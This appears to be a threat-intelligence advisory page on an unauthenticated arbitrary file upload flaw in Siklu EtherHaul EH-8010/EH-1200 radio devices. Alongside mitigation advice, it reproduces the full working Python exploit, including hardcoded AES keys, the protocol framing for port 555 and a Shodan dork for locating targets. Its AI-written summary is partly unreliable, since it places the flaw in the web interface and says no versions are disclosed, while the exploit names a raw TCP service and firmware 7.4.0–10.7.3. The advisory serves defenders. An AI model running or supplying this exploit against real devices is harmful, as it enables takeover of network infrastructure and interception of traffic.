Siklu EtherHaul Series EH-8010 - Arbitrary File Upload
The Siklu EtherHaul Series EH-8010 devices are vulnerable to an arbitrary file upload exploit, allowing attackers to upload malicious files to the device. This vulnerability can lead to unauthorized code execution or system compromise. The exploit code is publicly available and written in Python, increasing the risk of exploitation. No specific affected versions or patches have been disclosed yet. The vulnerability primarily targets the web interface of the device. Although no known exploits in the wild have been reported, the presence of exploit code indicates a potential threat. European organizations using Siklu EtherHaul EH-8010 devices, especially in critical infrastructure or telecommunications, could be impacted. Mitigation requires monitoring for updates from the vendor and restricting access to device management interfaces. The threat severity is assessed as high due to the potential for unauthorized access and control without authentication requirements disclosed.
AI Analysis
Technical Summary
The Siklu EtherHaul Series EH-8010 devices have been identified as vulnerable to an arbitrary file upload vulnerability. This type of vulnerability allows an attacker to upload files of their choosing to the device, potentially enabling remote code execution or persistent compromise. The vulnerability resides in the web interface of the device, which is typically used for management and configuration. Although the specific affected firmware versions have not been disclosed, the exploit code has been published on Exploit-DB (EDB ID 52467) and is implemented in Python, facilitating exploitation by attackers with moderate technical skills. The arbitrary file upload can allow attackers to bypass authentication or input validation mechanisms, upload malicious scripts or binaries, and execute them on the device. This can lead to full device compromise, interception or manipulation of network traffic, or use of the device as a pivot point for further attacks. No patches or vendor advisories have been linked yet, indicating that the vulnerability may be unpatched or undisclosed publicly. The exploit does not require user interaction, and the ease of exploitation is increased by the availability of public exploit code. The vulnerability affects the confidentiality, integrity, and availability of the device and potentially the network it supports. Given the device's role in wireless backhaul communications, exploitation could disrupt critical network infrastructure.
Potential Impact
For European organizations, especially those in telecommunications, critical infrastructure, or enterprises relying on Siklu EtherHaul EH-8010 devices for wireless backhaul, this vulnerability poses a significant risk. Exploitation could lead to unauthorized access to network management interfaces, allowing attackers to manipulate traffic, intercept sensitive data, or disrupt network availability. This could impact service providers, government agencies, and enterprises dependent on reliable wireless communication links. The compromise of such devices could also facilitate lateral movement within networks, increasing the risk of broader network breaches. Disruption or interception of communications could have regulatory and compliance implications under GDPR and other European data protection laws. The lack of patches and public exploit code increases the urgency for European organizations to assess exposure and implement mitigations.
Mitigation Recommendations
1. Immediately restrict access to the management web interface of Siklu EtherHaul EH-8010 devices to trusted networks and IP addresses using network segmentation and firewall rules. 2. Implement strong authentication and access controls on device management interfaces, including multi-factor authentication if supported. 3. Monitor vendor communications and security advisories for patches or firmware updates addressing this vulnerability and apply them promptly. 4. Conduct regular vulnerability assessments and penetration testing focused on network infrastructure devices to detect exploitation attempts. 5. Use network intrusion detection systems (NIDS) to monitor for suspicious file upload attempts or unusual traffic patterns targeting these devices. 6. If possible, disable or limit file upload functionality on the device’s web interface until a patch is available. 7. Maintain an inventory of all Siklu EtherHaul devices in use and prioritize remediation based on criticality and exposure. 8. Educate network and security teams about the vulnerability and the availability of exploit code to increase vigilance.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Sweden, Belgium, Poland, Austria
Indicators of Compromise
- exploit-code: # Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload # Shodan Dork: "EH-8010" or "EH-1200" # Date: 2025-08-02 # Exploit Author: semaja2 - Andrew James <semaja2@gmail.com> # Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon # Software Link: ftp://ftp.bubakov.net/siklu/ # Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3 # Tested on: Linux # CVE: CVE-2025-57176 # Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/ #!/usr/bin/env python3 import argparse, socket, struct from Crypto.Cipher import AES PORT = 555 HDR_LEN = 0x90 IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72) KEY = bytes([ 0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5, 0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17, 0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0, 0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82 ]) def recv_exact(sock: socket.socket, n: int) -> bytes: out = bytearray() while len(out) < n: chunk = sock.recv(n - len(out)) if not chunk: raise ConnectionError('socket closed') out += chunk return bytes(out) def pad16_zero(b: bytes) -> bytes: r = len(b) & 0x0F return b if r == 0 else (b + b'\x00' * (16 - r)) def hdr_checksum(hdr: bytes) -> int: return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes: hdr = bytearray(HDR_LEN) hdr[0] = flag & 0xFF hdr[1] = msg & 0xFF struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF) p = path if path.endswith(b'\x00') else (path + b'\x00') max_path = HDR_LEN - 0x10 hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path] struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr)) return bytes(hdr) class RFPipeSession: def __init__(self, key: bytes, iv0: bytes): self.key = key self.send_iv = iv0 self.recv_iv = iv0 def enc_send(self, sock: socket.socket, data: bytes) -> None: cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv) ct = cipher.encrypt(data) self.send_iv = ct[-16:] sock.sendall(ct) def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes: if n_plain <= 0: return b'' n_padded = (n_plain + 15) & ~15 ct = recv_exact(sock, n_padded) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt[:n_plain] def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None: if len(hdr_plain) != HDR_LEN: raise ValueError('header must be 0x90 bytes') self.enc_send(sock, hdr_plain) def recv_header(self, sock: socket.socket) -> bytes: ct = recv_exact(sock, HDR_LEN) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt def connect_any(host: str, port: int) -> socket.socket: infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM) last_err = None for fam, st, proto, _, sa in infos: s = socket.socket(fam, st, proto) try: s.connect(sa) return s except Exception as e: last_err = e s.close() raise ConnectionError(f'connect failed: {last_err}') def main(): ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)') ap.add_argument('target', help='IPv4/IPv6 address') ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)') ap.add_argument('--file', required=True, help='local file to send as payload') ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response') args = ap.parse_args() with open(args.file, 'rb') as f: payload = f.read() path_bytes = args.path.encode('utf-8') hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes) sess = RFPipeSession(KEY, IV0) with connect_any(args.target, PORT) as s: sess.send_header(s, hdr_plain) if payload: sess.enc_send(s, pad16_zero(payload)) if args.recv: rh = sess.recv_header(s) flag = rh[0]; rmsg = rh[1] rlen = struct.unpack_from('<I', rh, 0x08)[0] print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}') if rmsg in (0x03, 0x05): return if rlen: body = sess.dec_recv(s, rlen) if body.endswith(b'\x00'): body = body[:-1] try: print(body.decode('utf-8', errors='replace')) except Exception: print(body.hex()) if __name__ == '__main__': main()
Siklu EtherHaul Series EH-8010 - Arbitrary File Upload
Description
The Siklu EtherHaul Series EH-8010 devices are vulnerable to an arbitrary file upload exploit, allowing attackers to upload malicious files to the device. This vulnerability can lead to unauthorized code execution or system compromise. The exploit code is publicly available and written in Python, increasing the risk of exploitation. No specific affected versions or patches have been disclosed yet. The vulnerability primarily targets the web interface of the device. Although no known exploits in the wild have been reported, the presence of exploit code indicates a potential threat. European organizations using Siklu EtherHaul EH-8010 devices, especially in critical infrastructure or telecommunications, could be impacted. Mitigation requires monitoring for updates from the vendor and restricting access to device management interfaces. The threat severity is assessed as high due to the potential for unauthorized access and control without authentication requirements disclosed.
AI-Powered Analysis
Technical Analysis
The Siklu EtherHaul Series EH-8010 devices have been identified as vulnerable to an arbitrary file upload vulnerability. This type of vulnerability allows an attacker to upload files of their choosing to the device, potentially enabling remote code execution or persistent compromise. The vulnerability resides in the web interface of the device, which is typically used for management and configuration. Although the specific affected firmware versions have not been disclosed, the exploit code has been published on Exploit-DB (EDB ID 52467) and is implemented in Python, facilitating exploitation by attackers with moderate technical skills. The arbitrary file upload can allow attackers to bypass authentication or input validation mechanisms, upload malicious scripts or binaries, and execute them on the device. This can lead to full device compromise, interception or manipulation of network traffic, or use of the device as a pivot point for further attacks. No patches or vendor advisories have been linked yet, indicating that the vulnerability may be unpatched or undisclosed publicly. The exploit does not require user interaction, and the ease of exploitation is increased by the availability of public exploit code. The vulnerability affects the confidentiality, integrity, and availability of the device and potentially the network it supports. Given the device's role in wireless backhaul communications, exploitation could disrupt critical network infrastructure.
Potential Impact
For European organizations, especially those in telecommunications, critical infrastructure, or enterprises relying on Siklu EtherHaul EH-8010 devices for wireless backhaul, this vulnerability poses a significant risk. Exploitation could lead to unauthorized access to network management interfaces, allowing attackers to manipulate traffic, intercept sensitive data, or disrupt network availability. This could impact service providers, government agencies, and enterprises dependent on reliable wireless communication links. The compromise of such devices could also facilitate lateral movement within networks, increasing the risk of broader network breaches. Disruption or interception of communications could have regulatory and compliance implications under GDPR and other European data protection laws. The lack of patches and public exploit code increases the urgency for European organizations to assess exposure and implement mitigations.
Mitigation Recommendations
1. Immediately restrict access to the management web interface of Siklu EtherHaul EH-8010 devices to trusted networks and IP addresses using network segmentation and firewall rules. 2. Implement strong authentication and access controls on device management interfaces, including multi-factor authentication if supported. 3. Monitor vendor communications and security advisories for patches or firmware updates addressing this vulnerability and apply them promptly. 4. Conduct regular vulnerability assessments and penetration testing focused on network infrastructure devices to detect exploitation attempts. 5. Use network intrusion detection systems (NIDS) to monitor for suspicious file upload attempts or unusual traffic patterns targeting these devices. 6. If possible, disable or limit file upload functionality on the device’s web interface until a patch is available. 7. Maintain an inventory of all Siklu EtherHaul devices in use and prioritize remediation based on criticality and exposure. 8. Educate network and security teams about the vulnerability and the availability of exploit code to increase vigilance.
Technical Details
- Edb Id
- 52467
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Siklu EtherHaul Series EH-8010 - Arbitrary File Upload
# Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload # Shodan Dork: "EH-8010" or "EH-1200" # Date: 2025-08-02 # Exploit Author: semaja2 - Andrew James <semaja2@gmail.com> # Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon # Software Link: ftp://ftp.bubakov.net/siklu/ # Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3 # Tested on: Linux # CVE: CVE-2025-57176 # Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/ #!/usr/bin/... (4411 more characters)
Threat ID: 696c9008d302b072d9ad2ab6
Added to database: 1/18/2026, 7:47:20 AM
Last enriched: 1/18/2026, 7:47:49 AM
Last updated: 1/18/2026, 2:31:22 PM
Views: 6
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Siklu EtherHaul Series EH-8010 - Remote Command Execution
MediumRPi-Jukebox-RFID 2.8.0 - Remote Command Execution
MediumFive Malicious Chrome Extensions Impersonate Workday and NetSuite to Hijack Accounts
MediumIn Other News: FortiSIEM Flaw Exploited, Sean Plankey Renominated, Russia’s Polish Grid Attack
MediumCisco Patches Zero-Day RCE Exploited by China-Linked APT in Secure Email Gateways
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.